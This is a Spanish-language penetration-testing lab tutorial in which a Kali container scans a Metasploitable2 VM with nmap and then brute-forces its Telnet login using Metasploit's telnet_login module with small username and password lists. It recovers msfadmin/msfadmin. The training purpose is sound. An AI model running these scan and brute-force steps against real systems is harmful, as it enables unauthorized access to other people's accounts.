Introducción
En este laboratorio, aprenderemos cómo explotar la vulnerabilidad del servicio Telnet y realizar un ataque de penetración. El escenario implica utilizar la máquina Kali Linux como máquina atacante y la máquina virtual Metasploitable2 como máquina objetivo. El objetivo es escanear la máquina objetivo en busca de vulnerabilidades, identificar la vulnerabilidad del servicio Telnet y explotarla utilizando el framework Metasploit.
Iniciar el entorno de laboratorio
En este paso, iniciaremos el entorno de laboratorio, que incluye el contenedor Kali Linux y la máquina virtual Metasploitable2.
- Abre una terminal xfce en la máquina host de LabEx e inicia el objetivo Metasploitable2 ejecutando el siguiente comando:
sudo virsh start Metasploitable2
Espera a que la máquina objetivo se inicie; puede tardar entre 1 y 3 minutos.
- Prueba la conectividad con la máquina objetivo haciendo ping:
ping 192.168.122.102
Presiona Ctrl+C para detener el ping.
- Inicia el contenedor Kali Linux y entra en el entorno bash ejecutando:
docker run -ti --network host b5b709a49cd5 bash
- Dentro del contenedor Kali, prueba la conexión de red con la máquina objetivo:
ping 192.168.122.102
Presiona Ctrl+C para detener el ping.
Ahora, tanto la máquina atacante como la máquina objetivo están en funcionamiento, y puedes comenzar con las pruebas de penetración.
Nota: Si sales accidentalmente del bash actual, el contenedor Kali se detendrá automáticamente. Puedes ejecutar docker run -ti --network host b5b709a49cd5 bash nuevamente en el host para iniciar un nuevo contenedor Kali y entrar en bash para continuar con el experimento.
Realizar el escaneo de vulnerabilidades
En este paso, utilizaremos Nmap para escanear la máquina objetivo en busca de puertos y servicios abiertos.
Primero, inicia la base de datos PostgreSQL, ya que Metasploit la requiere para el almacenamiento de datos:
service postgresql start
msfdb init
cd ~
msfconsole
Dentro de la consola de Metasploit, ejecuta el escaneo de Nmap contra la máquina objetivo:
nmap -sV -T4 192.168.122.102
La opción -sV escanea los puertos abiertos y muestra información detallada, mientras que -T4 establece la política de temporización del escaneo (de 0 a 5; los valores más altos son más rápidos pero generan más ruido).
Analizar los resultados del escaneo
En este paso, analizaremos los resultados del escaneo de Nmap para identificar el servicio Telnet vulnerable.
La salida del escaneo de Nmap muestra que el servicio Telnet se está ejecutando en el puerto 23 con el banner "Linux telnetd". Busquemos el módulo de Metasploit correspondiente:
search scanner/telnet
Utiliza el módulo auxiliary/scanner/telnet/telnet_login:
use auxiliary/scanner/telnet/telnet_login
Muestra las opciones del módulo:
show options
La opción requerida es RHOSTS, que especifica el host o los hosts objetivo.
Presiona Ctrl+D para salir de la consola de Metasploit y luego comienza la inspección
Preparar el diccionario de nombres de usuario y contraseñas
En este paso, prepararemos los archivos de diccionario de nombres de usuario y contraseñas para el ataque de fuerza bruta de inicio de sesión.
Regresa a la shell del contenedor Kali antes de crear los archivos. Si aún estás dentro de msfconsole, presiona Ctrl+D para salir a la shell del contenedor. Tu prompt debería verse similar a root@...:/#.
Crea /username.txt con los siguientes nombres de usuario:
cat > /username.txt <<'EOF'
123456
admin
msfadmin
root
kali
EOF
Crea /password.txt con las siguientes contraseñas:
cat > /password.txt <<'EOF'
abc123
1234
123456
root
msfadmin
admin
toor
EOF
Estos archivos se utilizarán como diccionarios de nombres de usuario y contraseñas para el ataque de fuerza bruta.
Configurar el módulo de Metasploit
En este paso, configuraremos el módulo de Metasploit con el host objetivo, el diccionario de nombres de usuario y el diccionario de contraseñas.
En primer lugar, si no estás en la consola de Metasploit, debes iniciarla:
cd ~
msfconsole
Utiliza el módulo auxiliary/scanner/telnet/telnet_login:
use auxiliary/scanner/telnet/telnet_login
Establece el host objetivo:
set RHOSTS 192.168.122.102
Establece el archivo de diccionario de nombres de usuario:
set USER_FILE /username.txt
Establece el archivo de diccionario de contraseñas:
set PASS_FILE /password.txt
Por último, ejecuta el exploit:
exploit
Metasploit comenzará a probar diferentes combinaciones de nombres de usuario y contraseñas de los diccionarios proporcionados. Si se encuentra una credencial válida, se mostrará en verde.
En este caso, la credencial válida es msfadmin/msfadmin.
Presiona Ctrl+D para salir de la consola de Metasploit y luego comienza la inspección
Resumen
En este laboratorio, aprendimos cómo explotar la vulnerabilidad del servicio Telnet utilizando el framework Metasploit. Comenzamos configurando el entorno de laboratorio con la máquina atacante Kali Linux y la máquina objetivo Metasploitable2. Luego, realizamos un escaneo de vulnerabilidades usando Nmap para identificar el servicio Telnet abierto. A continuación, preparamos los diccionarios de nombres de usuario y contraseñas, y configuramos el módulo de Metasploit con el host objetivo y los archivos de diccionario. Finalmente, ejecutamos el exploit y logramos obtener las credenciales de inicio de sesión de Telnet mediante fuerza bruta.
Este laboratorio proporcionó experiencia práctica en pruebas de penetración, escaneo de vulnerabilidades y el uso del framework Metasploit para explotar vulnerabilidades. Destacó la importancia de las prácticas de seguridad en las contraseñas y los riesgos potenciales de utilizar credenciales débiles o fáciles de adivinar.



